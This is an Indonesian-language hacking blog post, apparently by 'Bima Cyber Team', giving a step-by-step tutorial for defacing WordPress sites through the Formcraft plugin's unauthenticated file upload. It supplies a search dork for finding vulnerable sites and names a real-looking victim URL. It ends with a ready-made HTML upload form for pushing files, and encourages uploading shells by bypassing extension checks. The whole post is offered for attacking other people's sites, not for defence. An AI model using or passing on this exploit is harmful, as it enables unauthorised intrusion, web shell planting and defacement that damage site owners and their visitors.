Deface Dengan Wordpress Plugin Formcraft

Deface Dengan Wordpress Plugin Formcraft

Oke Gengs, Kali Ini Gue Akan Share Tutorial Deface Dengan Exploit Plugin Formcraft di Wordpress. Emang Nih Wordpress Gaada Matinya ahahaha.
Bagaikan Mati Satu Tumbuh Seribu XD

Oke Langsung aja Deh.
Dork: Index Of "/wp-content/plugins/formcraft/file-upload/server/" intext:content
Kembangin Lagi Biar Dapet Yang Verawan

Exploit: upload.php 

 Pertama Kalian Dorking dulu Dengan Dork Yg Diatas.

klik agar image jelas!

Pilih Salah Satu dulu aje ye :)

Buka Target Kalian Tadi Misal Gw > http://mclvt.org/wp-content/plugins/formcraft/file-upload/server/content/

Kalo Udah Gitu Masukin Exploit Upload.php atau tinggal klik aja :V

Vuln? Error : {"failed":"No file found 2"}
 Trus Masukin Target Kalian Di CSRF nya :) csrf di bawah entar ya!
Save CSRF dengan format namacsrf.html
Trus Buka Pake Browser lu ya, Jangan Pinjem Browser Orang xD

Pilih file txt kalian ahaha kali aja yg jago bypass extensi shell bisa nih ye wkwk.
trus klik upload.

 Noh Langsung Dikasih Akses file Kalian xD

Akses : localhost//wp-content/plugins/formcraft/file-upload/server/content/files/angkarandom_namafile.txt

 Dan Taraaa!

Oke Sekian tutorial Dari saya :)

Bima Cyber Team

CSRF Nya :
 <form method="POST" action="http://localhost/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>